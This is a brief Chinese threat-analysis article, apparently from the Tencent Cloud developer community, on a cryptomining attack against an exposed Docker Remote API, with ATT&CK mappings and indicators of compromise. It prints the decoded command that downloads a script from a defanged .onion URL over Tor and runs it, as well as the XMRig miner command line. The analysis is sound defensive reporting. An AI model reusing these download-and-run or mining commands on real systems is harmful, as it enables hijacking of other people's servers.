攻击始于对Docker Remote API的探测请求(源IP: 198.199.72.27),随后攻击者创建挂载宿主机根目录的Alpine容器,通过base64编码隐藏恶意命令:
# 解码后的攻击命令
sh -c curl --socks5-hostname tor:9050 -o /docker-init.sh http[:]//xxx.onion/static/docker-init.sh && chmod +x /docker-init.sh && /docker-init.sh
最终执行的XMRig矿工包含完整配置:
./system -o pool.moneroocean.stream:10128 -u 49... -p x -a rx/0
战术阶段 | 技术点 | ID |
---|---|---|
初始访问 | 利用公开应用漏洞 | T1190 |
防御规避 | 文件混淆(Zstd压缩) | T1027.015 |
命令与控制 | 多跳代理(Tor) | T1090.003 |
SHA256 | 文件名称 | 检测名称 |
---|---|---|
1bb95a02f1c12... | pkg-updater | Coinminer.Linux.MALXMR.SMDSL64 |
http://xxx.onion/static/docker-init.sh | 恶意脚本下载URL |
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。